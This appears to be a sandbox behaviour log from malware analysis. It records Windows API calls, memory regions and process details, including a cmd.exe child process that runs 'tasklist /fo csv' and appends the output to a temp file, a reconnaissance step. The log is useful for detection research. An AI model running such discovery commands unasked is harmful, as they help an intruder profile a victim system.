[0415.249] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x15da90, pulNumLanguages=0x12de480 | out: pulNumLanguages=0x12de480) returned 1
[0415.249] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da90 | out: hHeap=0x120000) returned 1
Thread:
id = 125
os_tid = 0xcd4
[0406.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x9e5f4a0, dwHighDateTime=0x1dab599))
[0406.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x9e5f4a0, dwHighDateTime=0x1dab599))
[0406.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x9e5f4a0, dwHighDateTime=0x1dab599))
[0406.346] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0x493d0, bAlertable=0) returned 0x0
[0410.821] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0415.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0xf306300, dwHighDateTime=0x1dab599))
[0415.232] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0x2720, bAlertable=0) returned 0x102
[0425.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10afa58 | out: lpSystemTimeAsFileTime=0x10afa58*(dwLowDateTime=0x152895c0, dwHighDateTime=0x1dab599))
[0425.238] free (_Block=0x2bf020)
[0425.238] FreeLibrary (hLibModule=0x77880000) returned 1
[0425.240] free (_Block=0x2c3750)
[0425.241] free (_Block=0x2bd400)
[0425.241] WaitForSingleObjectEx (hHandle=0x1f8, dwMilliseconds=0xffffffff, bAlertable=0)
Thread:
id = 126
os_tid = 0xcd0
Thread:
id = 127
os_tid = 0xcc0
Thread:
id = 128
os_tid = 0xcbc
Thread:
id = 129
os_tid = 0xcb8
Thread:
id = 140
os_tid = 0xdac
Thread:
id = 141
os_tid = 0xda4
Process:
id = "22"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x65682000"
os_pid = "0x628"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e990"
monitor_reason = "rpc_server"
parent_id = "5"
os_parent_pid = "0x254"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000da1c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Thread:
id = 130
os_tid = 0xc34
Thread:
id = 131
os_tid = 0xae8
Thread:
id = 132
os_tid = 0x288
Thread:
id = 133
os_tid = 0x6d8
Thread:
id = 134
os_tid = 0x6f8
Thread:
id = 135
os_tid = 0x61c
Process:
id = "23"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x2c979000"
os_pid = "0xdb8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "17"
os_parent_pid = "0x424"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3132
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3133
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3134
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3135
start_va = 0x210000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 3136
start_va = 0x4a1d0000
end_va = 0x4a228fff
monitored = 1
entry_point = 0x4a1d90b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 3137
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3138
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 3139
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3140
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3141
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3142
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 3143
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3144
start_va = 0x50000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 3145
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3146
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3147
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3148
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3149
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3150
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 3151
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3152
start_va = 0x110000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 3153
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3154
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 3155
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3156
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3157
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3158
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3159
start_va = 0x310000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 3160
start_va = 0x310000
end_va = 0x40ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 3161
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3162
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3163
start_va = 0x4e0000
end_va = 0x667fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004e0000"
filename = ""
Region:
id = 3164
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3165
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3166
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3167
start_va = 0x670000
end_va = 0x7f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 3168
start_va = 0x800000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 3169
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 3170
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 3171
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 3172
start_va = 0x1c00000
end_va = 0x1ecefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 142
os_tid = 0xe18
[0410.133] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0410.134] GetProcessHeap () returned 0x110000
[0410.134] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4012) returned 0x12aff0
[0410.134] GetProcessHeap () returned 0x110000
[0410.134] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12aff0 | out: hHeap=0x110000) returned 1
[0410.137] _wcsicmp (_String1="tasklist", _String2=")") returned 75
[0410.137] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14
[0410.137] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14
[0410.137] _wcsicmp (_String1="IF", _String2="tasklist") returned -11
[0410.137] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11
[0410.153] _wcsicmp (_String1="REM", _String2="tasklist") returned -2
[0410.153] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2
[0410.153] GetProcessHeap () returned 0x110000
[0410.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb0) returned 0x129e40
[0410.153] GetProcessHeap () returned 0x110000
[0410.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x22) returned 0x124760
[0410.154] GetProcessHeap () returned 0x110000
[0410.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x124790
[0410.154] GetProcessHeap () returned 0x110000
[0410.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x38) returned 0x1267b0
[0410.163] GetProcessHeap () returned 0x110000
[0410.163] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x6a) returned 0x129f00
[0410.165] GetProcessHeap () returned 0x110000
[0410.165] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x1247c0
[0410.165] _get_osfhandle (_FileHandle=1) returned 0x7
[0410.166] _get_osfhandle (_FileHandle=1) returned 0x7
[0410.166] _get_osfhandle (_FileHandle=1) returned 0x7
[0410.166] GetFileType (hFile=0x7) returned 0x2
[0410.167] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0410.167] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f4d8 | out: lpMode=0x30f4d8) returned 1
[0410.168] _dup (_FileHandle=1) returned 3
[0410.169] _close (_FileHandle=1) returned 0
[0410.170] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0410.170] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x30f488, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54
[0410.170] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 1
[0410.171] _get_osfhandle (_FileHandle=1) returned 0x54
[0410.171] GetFileType (hFile=0x54) returned 0x1
[0410.171] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41
[0410.171] SetFilePointer (in: hFile=0x54, lDistanceToMove=-1, lpDistanceToMoveHigh=0x30f4e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x30f4e8*=0) returned 0x40
[0410.171] ReadFile (in: hFile=0x54, lpBuffer=0x30f4d8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x30f480, lpOverlapped=0x0 | out: lpBuffer=0x30f4d8*, lpNumberOfBytesRead=0x30f480*=0x1, lpOverlapped=0x0) returned 1
[0410.173] GetConsoleTitleW (in: lpConsoleTitle=0x30f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0410.175] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0410.175] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0410.175] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0410.175] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0410.175] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0410.175] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0410.175] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0410.175] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0410.175] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0410.175] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0410.175] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0410.175] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0410.176] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0410.176] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0410.176] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0410.176] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0410.176] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0410.176] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0410.176] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0410.176] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0410.176] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0410.176] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0410.176] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0410.176] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0410.176] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0410.176] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0410.176] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0410.176] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0410.177] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0410.177] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0410.177] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0410.177] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0410.177] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0410.177] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0410.177] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0410.177] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0410.177] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0410.177] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0410.177] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0410.177] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0410.177] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0410.177] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0410.177] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0410.177] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0410.178] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0410.178] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0410.178] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0410.178] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0410.178] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0410.178] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0410.178] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0410.178] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0410.178] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0410.178] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0410.178] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0410.178] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0410.178] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0410.178] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0410.178] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0410.178] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0410.179] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0410.179] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0410.179] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0410.179] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0410.179] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0410.179] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0410.179] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0410.179] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0410.179] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0410.179] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0410.179] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0410.179] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0410.179] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0410.179] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0410.179] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0410.179] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0410.180] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0410.180] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0410.180] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0410.180] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0410.180] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0410.180] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0410.180] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0410.180] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0410.180] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14
[0410.180] _wcsicmp (_String1="tasklist", _String2="IF") returned 11
[0410.180] _wcsicmp (_String1="tasklist", _String2="REM") returned 2
[0410.181] GetProcessHeap () returned 0x110000
[0410.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x218) returned 0x129f80
[0410.181] GetProcessHeap () returned 0x110000
[0410.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x36) returned 0x126870
[0410.182] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17
[0410.182] GetProcessHeap () returned 0x110000
[0410.183] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x420) returned 0x12aff0
[0410.183] SetErrorMode (uMode=0x0) returned 0x0
[0410.183] SetErrorMode (uMode=0x1) returned 0x0
[0410.183] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x12b000, lpFilePart=0x30eda0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x30eda0*="system32") returned 0x13
[0410.183] SetErrorMode (uMode=0x0) returned 0x1
[0410.183] GetProcessHeap () returned 0x110000
[0410.183] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x12aff0, Size=0x4a) returned 0x12aff0
[0410.184] GetProcessHeap () returned 0x110000
[0410.184] RtlSizeHeap (HeapHandle=0x110000, Flags=0x0, MemoryPointer=0x12aff0) returned 0x4a
[0410.184] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1ff360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0410.184] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0410.184] GetProcessHeap () returned 0x110000
[0410.184] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1ce) returned 0x12a1a0
[0410.184] GetProcessHeap () returned 0x110000
[0410.184] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x38c) returned 0x12b050
[0410.197] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1ff360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0410.197] GetProcessHeap () returned 0x110000
[0410.197] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xe8) returned 0x12a380
[0410.200] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0410.200] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*" (normalized: "c:\\windows\\system32\\tasklist.*"), fInfoLevelId=0x1, lpFindFileData=0x30eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb10) returned 0x12a410
[0410.200] GetProcessHeap () returned 0x110000
[0410.200] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x1247f0
[0410.200] FindClose (in: hFindFile=0x12a410 | out: hFindFile=0x12a410) returned 1
[0410.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM" (normalized: "c:\\windows\\system32\\tasklist.com"), fInfoLevelId=0x1, lpFindFileData=0x30eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb10) returned 0xffffffffffffffff
[0410.201] GetLastError () returned 0x2
[0410.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE" (normalized: "c:\\windows\\system32\\tasklist.exe"), fInfoLevelId=0x1, lpFindFileData=0x30eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb10) returned 0x12a410
[0410.201] GetProcessHeap () returned 0x110000
[0410.201] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x1247f0, Size=0x8) returned 0x128620
[0410.202] FindClose (in: hFindFile=0x12a410 | out: hFindFile=0x12a410) returned 1
[0410.202] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0410.202] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0410.202] GetConsoleTitleW (in: lpConsoleTitle=0x30f060, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0410.208] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ee18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30edd8 | out: lpAttributeList=0x30ee18, lpSize=0x30edd8) returned 1
[0410.208] UpdateProcThreadAttribute (in: lpAttributeList=0x30ee18, dwFlags=0x0, Attribute=0x60001, lpValue=0x30edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ee18, lpPreviousValue=0x0) returned 1
[0410.208] GetStartupInfoW (in: lpStartupInfo=0x30ef30 | out: lpStartupInfo=0x30ef30*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0410.208] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1
